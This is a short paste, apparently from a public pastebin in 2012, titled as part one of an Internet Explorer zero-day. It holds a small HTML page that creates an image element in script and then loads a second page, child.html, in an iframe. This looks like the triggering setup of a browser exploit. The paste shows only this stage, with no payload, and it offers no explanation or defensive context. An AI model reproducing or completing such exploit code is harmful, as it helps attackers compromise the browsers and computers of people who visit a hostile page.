
Part one of the September IE 0-day
By: a guest on
Sep 18th, 2012 | syntax:
HTML | size: 0.16 KB | hits: 1,092 | expires: Never
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "L";
</script>
<iframe src="child.html">
</body>